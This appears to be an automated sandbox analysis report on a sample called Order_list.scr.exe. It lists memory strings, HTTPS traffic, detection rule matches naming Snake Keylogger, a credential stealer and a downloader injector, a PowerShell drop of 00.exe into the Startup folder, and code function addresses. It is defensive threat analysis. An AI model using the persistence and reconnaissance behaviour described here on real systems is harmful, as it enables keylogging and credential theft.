            Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745

            System Summary

            barindex
            Source: 0.2.Order_list.scr.exe.29590ec.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Order_list.scr.exe.4d40000.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Order_list.scr.exe.4d40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Order_list.scr.exe.3668570.3.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Order_list.scr.exe.29568ac.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.00.exe.2c76d58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.00.exe.2c79598.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: initial sampleStatic PE information: Filename: Order_list.scr.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeJump to dropped file
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 0_2_0093D3040_2_0093D304
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_016761083_2_01676108
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167C1903_2_0167C190
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167F0073_2_0167F007
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167B3283_2_0167B328
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167C4703_2_0167C470
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167C7533_2_0167C753
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_016798583_2_01679858
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_016768803_2_01676880
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167BBD33_2_0167BBD3
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167CA333_2_0167CA33
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_01674AD93_2_01674AD9
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167BEB73_2_0167BEB7
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167E5283_2_0167E528
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167E5173_2_0167E517
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_0167B4F33_2_0167B4F3
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAC9D83_2_05DAC9D8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DABD383_2_05DABD38
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAB0A03_2_05DAB0A0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA70503_2_05DA7050
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAA4083_2_05DAA408
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAD0283_2_05DAD028
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAC3883_2_05DAC388
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA8B583_2_05DA8B58
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAB6E83_2_05DAB6E8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAAA583_2_05DAAA58
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAD6703_2_05DAD670
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA86083_2_05DA8608
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAC9C83_2_05DAC9C8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA85FC3_2_05DA85FC
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA51983_2_05DA5198
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA11913_2_05DA1191
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA518B3_2_05DA518B
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA81B03_2_05DA81B0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA11A03_2_05DA11A0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA81A03_2_05DA81A0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA7D583_2_05DA7D58
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA0D483_2_05DA0D48
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA7D483_2_05DA7D48
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA79003_2_05DA7900
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA0D393_2_05DA0D39
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DABD283_2_05DABD28
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA08F03_2_05DA08F0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA78F03_2_05DA78F0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA08E03_2_05DA08E0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA04983_2_05DA0498
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA74973_2_05DA7497
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA04883_2_05DA0488
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAB08F3_2_05DAB08F
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA74A83_2_05DA74A8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA00403_2_05DA0040
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA70403_2_05DA7040
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA28183_2_05DA2818
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAD0183_2_05DAD018
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA00073_2_05DA0007
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA28073_2_05DA2807
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA44303_2_05DA4430
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA6BD03_2_05DA6BD0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA6BC13_2_05DA6BC1
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAA3F83_2_05DAA3F8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA33B83_2_05DA33B8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA33A83_2_05DA33A8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA67783_2_05DA6778
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAC3783_2_05DAC378
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA676B3_2_05DA676B
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA63113_2_05DA6311
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA37303_2_05DA3730
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA63203_2_05DA6320
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAB6D93_2_05DAB6D9
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA5EC83_2_05DA5EC8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA5EB83_2_05DA5EB8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAAA483_2_05DAAA48
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA5A703_2_05DA5A70
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DAD6623_2_05DAD662
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA5A603_2_05DA5A60
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA56183_2_05DA5618
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 3_2_05DA56093_2_05DA5609
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 5_2_027325D85_2_027325D8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 5_2_0273D3045_2_0273D304
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 5_2_04E465B05_2_04E465B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 5_2_04E4B3585_2_04E4B358
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 5_2_04E400405_2_04E40040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 5_2_04E400065_2_04E40006
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 5_2_04E457F15_2_04E457F1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AF0188_2_009AF018
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AC1968_2_009AC196
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009A61188_2_009A6118
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AB3288_2_009AB328
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AC4708_2_009AC470
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009A35808_2_009A3580
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AC7528_2_009AC752
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009A98588_2_009A9858
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009A4AD98_2_009A4AD9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009ACA328_2_009ACA32
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009ABBD28_2_009ABBD2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009ABEB68_2_009ABEB6
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AF0078_2_009AF007
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AB4F28_2_009AB4F2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AE5178_2_009AE517
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_009AE5288_2_009AE528
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063284608_2_06328460
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06327D908_2_06327D90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063238708_2_06323870
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063200408_2_06320040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063211C08_2_063211C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632C6388_2_0632C638
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632F6108_2_0632F610
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632F6008_2_0632F600
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632C6488_2_0632C648
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632CEF88_2_0632CEF8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632CEEA8_2_0632CEEA
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06326F138_2_06326F13
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632D7A88_2_0632D7A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632D7988_2_0632D798
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06326F8B8_2_06326F8B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063237E88_2_063237E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632DC008_2_0632DC00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632E4B08_2_0632E4B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063204A08_2_063204A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632E4A08_2_0632E4A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063204908_2_06320490
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632B4E88_2_0632B4E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632B4D78_2_0632B4D7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06320D608_2_06320D60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632ED608_2_0632ED60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632ED508_2_0632ED50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06320D518_2_06320D51
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632BD988_2_0632BD98
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632BD888_2_0632BD88
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632FA688_2_0632FA68
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632FA598_2_0632FA59
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632CAA08_2_0632CAA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632D3508_2_0632D350
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632D3408_2_0632D340
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632DBF18_2_0632DBF1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063273E88_2_063273E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063273D88_2_063273D8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632001E8_2_0632001E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063238608_2_06323860
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632E0588_2_0632E058
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632E0498_2_0632E049
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063208F08_2_063208F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632E8F88_2_0632E8F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632B9308_2_0632B930
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063209008_2_06320900
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632E9088_2_0632E908
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632B9408_2_0632B940
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063211B08_2_063211B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632F1B88_2_0632F1B8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632F1A98_2_0632F1A9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632C1F08_2_0632C1F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0632C1E08_2_0632C1E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063586088_2_06358608
